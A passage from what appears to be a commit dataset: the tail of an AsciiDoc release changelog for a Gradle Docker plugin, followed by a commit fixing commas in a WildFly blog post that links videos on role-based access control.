Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task 
`DockerLivenessContainer` had its polling logic reworked to be more failure-proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc.) but will eventually have all its keys\/values resolved to Java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDEs. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars`, which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. Its `probe` method has been renamed to `livenessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fall back to checking if the container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. 
- {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fall back to the just-created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow the user to define a list of successful exit codes the exec is allowed to return, failing if the actual code is not in the list. Default behavior is to perform no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running container's logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time, issue a stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific IPv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump Gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with JDK 9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache the `docker-java` client instead of recreating it for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create the file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during Gradle's configuration phase. 
- {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` then fall back to using the generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump Gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump Gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump version of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use the Groovy join function in favor of the JDK 8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standards - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump version of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump version of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump version of docker-java to 3.0.11 - 
{uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures' call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows inspecting an exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump version of docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per single ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups, as well as defaulting to the alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on 
`DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required, make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix for not checking if the parent dir already exists before creating it with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overridden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - 
{uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. 
Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - {uri-github}\/issues\/75[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2015)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. 
Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly adding user-based instructions to Dockerfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d1de82a92a1b4f1bd202b241a5403a635b07972","subject":"Add commas","message":"Add commas\n","repos":"luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org","old_file":"news\/2013-11-07-Role-Based-Access-Control-in-WildFly-8.adoc","new_file":"news\/2013-11-07-Role-Based-Access-Control-in-WildFly-8.adoc","new_contents":"= Role Based Access Control in WildFly 8\nbstansberry\n2013-11-07\n:revdate: 2013-11-07 12:39:25 -0600\n:awestruct-tags: [management, rbac, wildfly8, videos]\n:awestruct-layout: blog\n:source-highlighter: coderay\n\nOne of the big new features in WildFly 8 is the ability to enforce role based access control on management operations. I recorded some videos that describe how you can use this powerful feature, and also demonstrate it in action. 
Check them out!\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78780176\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78780176\">Role Based Access Control in WildFly 8 (Part 1 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the first part of the series, I walk through the basics of Role Based Access Control, and show how you can use standard roles within the WildFly Administration Console.\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78785944\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78785944\">Role Based Access Control in WildFly 8 (Part 2 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the second video, I show how you can configure roles and setup users which map to roles. \n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78786992\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78786992\">Role Based Access Control in WildFly 8 (Part 3 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the final video, I show how you can configure constraints which allow you to tweak the behavior of roles.\n","old_contents":"= Role Based Access Control in WildFly 8\nbstansberry\n2013-11-07\n:revdate: 2013-11-07 12:39:25 -0600\n:awestruct-tags: [management, rbac, wildfly8, videos]\n:awestruct-layout: blog\n:source-highlighter: coderay\n\nOne of the big new features in WildFly 8 is the ability to enforce role based access control on managmeent operations. I recorded some videos that describe how you can use this powerful feature, and also demonstrate it in action. Check them out!\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78780176\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78780176\">Role Based Access Control in WildFly 8 (Part 1 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the first part of the series I walk through the basics of Role Based Access Control, and show how you can use standard roles within the WildFly Administration Console.\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78785944\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78785944\">Role Based Access Control in WildFly 8 (Part 2 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the second video I show how you can configure roles and setup users which map to roles. 
